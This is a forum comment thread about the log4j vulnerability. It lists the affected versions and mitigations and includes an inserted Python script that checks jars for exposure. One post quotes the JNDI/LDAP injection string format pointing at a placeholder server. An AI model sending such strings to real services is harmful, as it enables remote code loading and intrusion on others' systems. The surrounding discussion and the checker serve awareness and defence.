This looks nasty! Watch your servers.
Or don't connect your server to the outside world…
I am puzzled. A whole page of words yet there is no information given (journalism at its finest).
So far I've got "do not have minecraft server on your production server (unless you patch it)".
If I had to run windows at home, Malwarebytes would be the only program I would run
lol.
Java on a Server? Serious? Never!
Every service that uses log4j can be attacked. It does not have to be internet-facing, because the attack can be carried to internal systems via payload.
log4j versions 2.0-beta9 to 2.14.1 are vulnerable, although log4j 2.10 or higher can be "hardened" against the attack by setting log4j2.formatMsgNoLookups to true or by removing the JndiLookup class. Log4j 2.15 is the first fixed version.
Several hosters already said that they see internet-wide scans for vulnerable services, most likely by attackers scanning for possible targets.
Here is an attempt by someone to list vulnerable services: https://github.com/YfryTchsGD/Log4jAttackSurface
Basically, everyone seems to be vulnerable.
Edit: Apparently, hackers only need to send a string in the format $JNDI:LDAP://SERVER/EXP to a vulnerable service to launch the attack.
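Added example, not part of any post in this thread: a Python check that applies the version range and the two mitigations listed in the post above to log4j-core jars. It assumes jars are named log4j-core-<version>.jar and that the class sits at its usual path inside the jar; the function names are made up for this example and the sample jars are constructed in memory.

```python
import io
import re
import zipfile

# Class the post says can be removed from the jar as a mitigation.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
STAGES = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # None = final release

def parse_version(text):
    """Turn '2.0-beta9' or '2.14.1' into a sortable tuple."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", text)
    if not m:
        raise ValueError(f"unrecognised version: {text!r}")
    return (int(m[1]), int(m[2]), int(m[3] or 0), STAGES[m[4]], int(m[5] or 0))

# Ranges exactly as stated in the post above.
FIRST_VULNERABLE = parse_version("2.0-beta9")
LAST_VULNERABLE = parse_version("2.14.1")
FLAG_SUPPORTED = parse_version("2.10")

def classify(version, has_jndi_class, no_lookups_flag=False):
    """Return 'not-in-range', 'mitigated' or 'vulnerable'."""
    v = parse_version(version)
    if not FIRST_VULNERABLE <= v <= LAST_VULNERABLE:
        return "not-in-range"
    if not has_jndi_class:
        return "mitigated"  # JndiLookup class removed from the jar
    if no_lookups_flag and v >= FLAG_SUPPORTED:
        return "mitigated"  # log4j2.formatMsgNoLookups=true, 2.10 or higher
    return "vulnerable"

def inspect_jar(filename, fileobj, no_lookups_flag=False):
    """Classify one log4j-core jar from its file name and contents."""
    m = re.fullmatch(r"log4j-core-(.+)\.jar", filename)
    if not m:
        return None  # not a log4j-core jar
    with zipfile.ZipFile(fileobj) as jar:
        has_class = JNDI_CLASS in jar.namelist()
    return classify(m[1], has_class, no_lookups_flag)

def make_jar(with_jndi):
    """Constructed sample: an in-memory zip standing in for a real jar."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        if with_jndi:
            jar.writestr(JNDI_CLASS, b"")
    buf.seek(0)
    return buf
```

Note that the flag is ignored for versions below 2.10, so a 2.9.x jar with the setting applied still comes back as vulnerable.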
LOL at the global mass scanning this has triggered.
So many l33t hax0rs / bad actors / nation states putting together lists of vulnerable services / organizations for potential future exploitation.
You can bet ransomware is being tweaked to use this CVE as a delivery mechanism too.
Only specific versions of log4j are vulnerable, small silver lining, but good luck opsec people trying to untangle this mess.
It's the Guardian, what do you expect? Useful information? Truth? Integrity? Any standards at all?
It's not even journalism, it's just tittle-tattle.
Update on the BBC.
The "flagship" payment system used by my country's government offices to make huge payments daily runs using Java Applets and hence needs Internet Explorer to run. There has been news about high school dropouts hacking the thing, but rewriting the application seems more expensive to the government than spending to catch these kids and dealing with losses there.
Technology is really amazing, isn't it
Well, rest assured, our purple little universe is far, far away from this issue. No Java on our server, only in my coffee mug